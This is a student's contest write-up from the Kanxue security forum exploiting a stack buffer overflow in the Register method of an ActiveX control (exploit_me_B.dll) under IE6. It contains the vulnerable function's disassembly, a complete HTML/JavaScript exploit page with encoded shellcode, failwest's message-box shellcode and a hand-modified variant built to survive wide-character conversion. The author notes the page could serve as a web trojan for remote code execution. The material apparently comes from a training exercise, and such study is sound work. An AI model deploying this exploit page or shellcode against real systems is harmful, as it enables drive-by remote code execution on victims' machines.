提交者看雪ID:likunkun
职业:(学生、程序员、安全专家、黑客技术爱好者、其他?)
学生(大四)
漏洞定位:
IE为IE6
漏洞定位在exploit_me_B.dll的register方法:
Function Register (
ByVal RegCode As String ,
ByVal UserName As String
) As Long
在定位UserName的时候有栈溢出问题。覆盖返回地址即可,由于是字串使得输入长度有了限制即最后的四个字节(或三个)要把返回地址覆盖(防止00因为返回地址里要有00)。不过返回地址的选择是个难题。在函数返回的时候只有edx指向了我们的shellcode。因为这是输入字符串一定要将满足大于7F的配对最后在IE里选择了0x004086BB为jmp edx。
026101B0 55 push ebp
026101B1 8BEC mov ebp, esp
026101B3 81EC 00010000 sub esp, 100
026101B9 8B45 0C mov eax, dword ptr [ebp+C]
026101BC 53 push ebx
026101BD 8B5D 10 mov ebx, dword ptr [ebp+10]
026101C0 56 push esi
026101C1 85C0 test eax, eax
026101C3 57 push edi
026101C4 75 1A jnz short 026101E0
026101C6 85DB test ebx, ebx
026101C8 75 1E jnz short 026101E8
026101CA 8B45 14 mov eax, dword ptr [ebp+14]
026101CD 8918 mov dword ptr [eax], ebx
026101CF 33C0 xor eax, eax
026101D1 8DA5 F4FEFFFF lea esp, dword ptr [ebp-10C]
026101D7 5F pop edi
026101D8 5E pop esi
026101D9 5B pop ebx
026101DA 8BE5 mov esp, ebp
026101DC 5D pop ebp
026101DD C2 1000 retn 10
026101E0 85DB test ebx, ebx
026101E2 0F84 DB000000 je 026102C3
026101E8 B9 40000000 mov ecx, 40
026101ED 33C0 xor eax, eax
026101EF 8DBD 00FFFFFF lea edi, dword ptr [ebp-100]
026101F5 85DB test ebx, ebx
026101F7 F3:AB rep stos dword ptr es:[edi]
026101F9 75 04 jnz short 026101FF
026101FB 33F6 xor esi, esi
026101FD EB 2F jmp short 0261022E
026101FF 53 push ebx
02610200 FF15 F8906B02 call dword ptr [<&KERNEL32.lstrlenW>] ; kernel32.lstrlenW;这里把注册码的长度求一下,一会转换
02610206 8D7C00 02 lea edi, dword ptr [eax+eax+2]
0261020A 8BC7 mov eax, edi
0261020C 83C0 03 add eax, 3
0261020F 24 FC and al, 0FC
02610211 E8 EAA10100 call 0262A400
02610216 8BF4 mov esi, esp
02610218 6A 00 push 0
0261021A 6A 00 push 0
0261021C 57 push edi
0261021D 56 push esi
0261021E 6A FF push -1
02610220 53 push ebx
02610221 6A 00 push 0
02610223 6A 00 push 0
02610225 C606 00 mov byte ptr [esi], 0
02610228 FF15 F4906B02 call dword ptr [<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte在这里转换
0261022E 8BFE mov edi, esi
02610230 83C9 FF or ecx, FFFFFFFF
02610233 33C0 xor eax, eax
02610235 8D95 00FFFFFF lea edx, dword ptr [ebp-100]
0261023B F2:AE repne scas byte ptr es:[edi]
0261023D F7D1 not ecx
0261023F 2BF9 sub edi, ecx
02610241 8BC1 mov eax, ecx
02610243 8BF7 mov esi, edi
02610245 8BFA mov edi, edx
02610247 C1E9 02 shr ecx, 2
0261024A F3:A5 rep movs dword ptr es:[edi], dword p>
0261024C 8BC8 mov ecx, eax//这里是重点,过长就溢出了
0261024E 83E1 03 and ecx, 3
02610251 F3:A4 rep movs byte ptr es:[edi], byte ptr>
02610253 8A85 00FFFFFF mov al, byte ptr [ebp-100]
02610259 84C0 test al, al
0261025B 75 28 jnz short 02610285
0261025D BF B4086D02 mov edi, 026D08B4 ; ASCII "unRegister"
02610262 83C9 FF or ecx, FFFFFFFF
02610265 33C0 xor eax, eax
02610267 8D95 00FFFFFF lea edx, dword ptr [ebp-100]
0261026D F2:AE repne scas byte ptr es:[edi]
0261026F F7D1 not ecx
02610271 2BF9 sub edi, ecx
02610273 8BC1 mov eax, ecx
02610275 8BF7 mov esi, edi
02610277 8BFA mov edi, edx
02610279 C1E9 02 shr ecx, 2
0261027C F3:A5 rep movs dword ptr es:[edi], dword p>
0261027E 8BC8 mov ecx, eax
02610280 83E1 03 and ecx, 3
02610283 F3:A4 rep movs byte ptr es:[edi], byte ptr>
02610285 8B75 08 mov esi, dword ptr [ebp+8]
02610288 8D8D 00FFFFFF lea ecx, dword ptr [ebp-100]
0261028E 51 push ecx
0261028F 8D8E C0000000 lea ecx, dword ptr [esi+C0]
02610295 E8 F616FEFF call 025F1990//字符不能过长,不然这个CALL会有问题
0261029A 8DBD 00FFFFFF lea edi, dword ptr [ebp-100]
026102A0 83C9 FF or ecx, FFFFFFFF
026102A3 33C0 xor eax, eax
026102A5 8D96 D0460000 lea edx, dword ptr [esi+46D0]
026102AB F2:AE repne scas byte ptr es:[edi]
026102AD F7D1 not ecx
026102AF 2BF9 sub edi, ecx
026102B1 8BC1 mov eax, ecx
026102B3 8BF7 mov esi, edi
026102B5 8BFA mov edi, edx
026102B7 C1E9 02 shr ecx, 2
026102BA F3:A5 rep movs dword ptr es:[edi], dword p>
026102BC 8BC8 mov ecx, eax
026102BE 83E1 03 and ecx, 3
026102C1 F3:A4 rep movs byte ptr es:[edi], byte ptr>
026102C3 8DA5 F4FEFFFF lea esp, dword ptr [ebp-10C]
026102C9 33C0 xor eax, eax
026102CB 5F pop edi
026102CC 5E pop esi
026102CD 5B pop ebx
026102CE 8BE5 mov esp, ebp
026102D0 5D pop ebp
026102D1 C2 1000 retn 10
网页代码:
<html>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></object>
<body>
<SCRIPT language="javascript">
var shellcode = unescape(
"%u6144%u0068%u006a%u000a%u0038%u001e%u0068%u0063%u58ef%u004f"+
"%u0066%u7b10%u000c%u62ce%u0010%u0066%u0005%u0032%u0074%u0050"+
"%u5b3c%u6095%u007e%u9b6b%u0033%u912f%u0004%u002b%u9297%u0033"+
"%u8e5b%u0066%u4f31%u0033%u0032%u0053%u0068%u0075%u0073%u0065"+
"%u0072%u0054%u0033%u8960%u5a84%u0030%u5a6f%u000c%u5a6d%u001c"+
"%uf8f5%u0031%u0059%u5a94%u0008%u74d9%u003d%u006a%u000a%u0038"+
"%u001e%u0075%u0006%u6672%uf8f5%u0057%u9d37%u0060%u5a68%u003c"+
"%u5a70%u0005%u0078%u0003%u86ec%u0059%u0020%u0003%u8ef6%u0033"+
"%uf8f5%u0047%u0050%u5b0a%u0066%u7bb2%u0004%u0066%u7075%u0008"+
"%u0066%u9ebd%u0003%u8123%u0030%u0058%u0003%u9bd4%u0053%u6091"+
"%u8fe1%u0003%u60d0%u0018%u4f59%u4e88%u005b%u003a%u8196%u0008"+
"%u6f66%u0007%u0003%u882a%u8148%u003b%u0054%u0024%u0020%u0075"+
"%u84ef%u0059%u6091%u0059%u0024%u0003%u8f2f%u003c%u007b%u6091"+
"%u0059%u001c%u0003%u8f34%u7f9a%u0010%u6e9c%u0010%u0003%u002c"+
"%u7cab%u005f%u738f%u0061%u003d%u006a%u000a%u0038%u001e%u0075"+
"%u4eb9%u0033%u8dfe%u0068%u0077%u0065%u0073%u0074%u0068%u0066"+
"%u0061%u0069%u006c%u5b06%u0053%u0050%u0050%u0053%uf8f5%u0057"+
"%u9ec3%uf8f5%u0057%u9d32%u0011%u0011%u0011%u0011%u0011%u0011"+
"%u0011%u0011%u0011%u0011%u0011%u0011%u0011%u0011%u0011%u0011"+
"%u0011%u0011%u0011%u0011%u0011%u0011%u0011%u0011%u0011%u0011"+
"%u0011%u0011%u0011%u0011%u0011%u0011%u0011%u0011%u7c8f%u0040");
var name = '22222';
target.Register(name, shellcode);
</script>
</body>
</html>
漏洞描述及危害分析:
可以做了网页木马,挂在网站上如果注册了这个ActiveX控件不得了。可以远程执行恶意代码。
shellcode描述
请注明shellcode来源:原创,修改,引用。
原创请给出开发说明
修改请给出修改说明,并注明出处,附加被引用代码
引用请给出功能描述,并注明出处,附加被引用代码
failwest的shellcode:
char popup_general[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8";
修改的failwest的shellcode:
"\x90\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x66\xB8\x91\x0C\xC1\xE0\x10\x66\x05\x32\x74\x50\x8B\xF4\x90\x8D\x7E\xF4\x90\x33\xDB\xB7\x04\x2B\xE3\x90\x33\xDB\x90\x66\x81"
"\xC3\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\xFF\x31\x59\x8B\x69\x08\xAD\x90\x3D"
"\x6A\x0A\x38\x1E\x75\x06\x95\x90\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x51\x33\xFF\x47\x50"
"\x8B\xC7\x66\xB9\x91\x04\x66\xC1\xE9\x08\x66\xF7\xE1\x03\xC3\x8B\x30\x58\x03\xF5\x99\x53\x90\x8B\xDE\x8B\x03\x90\xb1\x18\xd3\xe0\xd3\xe8\x5B\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0"
"\x46\xEB\xE6\x3B\x54\x24\x20\x75\xc9\x90\x59\x90\x8B\x59\x24\x03\xDD\x8B\x3C\x7B\x90\x8B\x59\x1C\x03\xDD\x90\xC1\xE7\x10\xC1\xEF\x10\x03\x2C\xBB\x95\x5F\xAB\x57"
"\x61\x3D\x6A\x0A\x38\x1E\x75\x81\x90\x33\xDB\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53"
"\xFF\x57\xF8";
由于在函数中需要02610228 FF15 F4906B02 call dword ptr [<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte所以说我们要先把自己的shellcode用相反的函数转一下:MultiByteToWideChar,但是后来发现问题如果shellcode中有的字符大于7F便不能转,后来又发现大于7F的字符一定的配对才可以转。于是花了12个小时把failwest的shellcode等价且配对的shellcode写出来了(即为上面那些),眼泪哗哗地……。现在知道NOP对shellcode的置换来说还是不错的嘛。我的代码生成的汇编是:
024FB5C8 90 nop
024FB5C9 FC cld
024FB5CA 68 6A0A381E push 1E380A6A
024FB5CF 68 6389D14F push 4FD18963
024FB5D4 66:B8 910C mov ax, 0C91
024FB5D8 C1E0 10 shl eax, 10
024FB5DB 66:05 3274 add ax, 7432
024FB5DF 50 push eax
024FB5E0 8BF4 mov esi, esp
024FB5E2 90 nop
024FB5E3 8D7E F4 lea edi, dword ptr [esi-C]
024FB5E6 90 nop
024FB5E7 33DB xor ebx, ebx
024FB5E9 B7 04 mov bh, 4
024FB5EB 2BE3 sub esp, ebx
024FB5ED 90 nop
024FB5EE 33DB xor ebx, ebx
024FB5F0 90 nop
024FB5F1 66:81C3 3332 add bx, 3233
024FB5F6 53 push ebx
024FB5F7 68 75736572 push 72657375
024FB5FC 54 push esp
024FB5FD 33D2 xor edx, edx
024FB5FF 64:8B5A 30 mov ebx, dword ptr fs:[edx+30]
024FB603 8B4B 0C mov ecx, dword ptr [ebx+C]
024FB606 8B49 1C mov ecx, dword ptr [ecx+1C]
024FB609 FF31 push dword ptr [ecx]
024FB60B 59 pop ecx
024FB60C 8B69 08 mov ebp, dword ptr [ecx+8]
024FB60F AD lods dword ptr [esi]
024FB610 90 nop
024FB611 3D 6A0A381E cmp eax, 1E380A6A
024FB616 75 06 jnz short 024FB61E
024FB618 95 xchg eax, ebp
024FB619 90 nop
024FB61A FF57 F8 call dword ptr [edi-8]
024FB61D 95 xchg eax, ebp
024FB61E 60 pushad
024FB61F 8B45 3C mov eax, dword ptr [ebp+3C]
024FB622 8B4C05 78 mov ecx, dword ptr [ebp+eax+78]
024FB626 03CD add ecx, ebp
024FB628 8B59 20 mov ebx, dword ptr [ecx+20]
024FB62B 03DD add ebx, ebp
024FB62D 51 push ecx
024FB62E 33FF xor edi, edi
024FB630 47 inc edi
024FB631 50 push eax
024FB632 8BC7 mov eax, edi
024FB634 66:B9 9104 mov cx, 491
024FB638 66:C1E9 08 shr cx, 8
024FB63C 66:F7E1 mul cx
024FB63F 03C3 add eax, ebx
024FB641 8B30 mov esi, dword ptr [eax]
024FB643 58 pop eax
024FB644 03F5 add esi, ebp
024FB646 99 cdq
024FB647 53 push ebx
024FB648 90 nop
024FB649 8BDE mov ebx, esi
024FB64B 8B03 mov eax, dword ptr [ebx]
024FB64D 90 nop
024FB64E B1 18 mov cl, 18
024FB650 D3E0 shl eax, cl
024FB652 D3E8 shr eax, cl
024FB654 5B pop ebx
024FB655 3AC4 cmp al, ah
024FB657 74 08 je short 024FB661
024FB659 C1CA 07 ror edx, 7
024FB65C 03D0 add edx, eax
024FB65E 46 inc esi
024FB65F ^ EB E6 jmp short 024FB647
024FB661 3B5424 20 cmp edx, dword ptr [esp+20]
024FB665 ^ 75 C9 jnz short 024FB630
024FB667 90 nop
024FB668 59 pop ecx
024FB669 90 nop
024FB66A 8B59 24 mov ebx, dword ptr [ecx+24]
024FB66D 03DD add ebx, ebp
024FB66F 8B3C7B mov edi, dword ptr [ebx+edi*2]
024FB672 90 nop
024FB673 8B59 1C mov ebx, dword ptr [ecx+1C]
024FB676 03DD add ebx, ebp
024FB678 90 nop
024FB679 C1E7 10 shl edi, 10
024FB67C C1EF 10 shr edi, 10
024FB67F 032CBB add ebp, dword ptr [ebx+edi*4]
024FB682 95 xchg eax, ebp
024FB683 5F pop edi
024FB684 AB stos dword ptr es:[edi]
024FB685 57 push edi
024FB686 61 popad
024FB687 3D 6A0A381E cmp eax, 1E380A6A
024FB68C ^ 75 81 jnz short 024FB60F
024FB68E 90 nop
024FB68F 33DB xor ebx, ebx
024FB691 53 push ebx
024FB692 68 77657374 push 74736577
024FB697 68 6661696C push 6C696166
024FB69C 8BC4 mov eax, esp
024FB69E 53 push ebx
024FB69F 50 push eax
024FB6A0 50 push eax
024FB6A1 53 push ebx
024FB6A2 FF57 FC call dword ptr [edi-4]
024FB6A5 53 push ebx
024FB6A6 FF57 F8 call dword ptr [edi-8]
024FB6A9 90 nop
exploit运行截图
自己的机子有HOOK,用的同学的电脑:(见附见)
稳定性与通用性论证
还是HOOK问题,不知道哪方的软件把我系统的LoadliraryHOOK了
可能是360,或卡巴。
创新性论证(可选)
shellcode的编写不知道是不是创新。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
上传的附件:
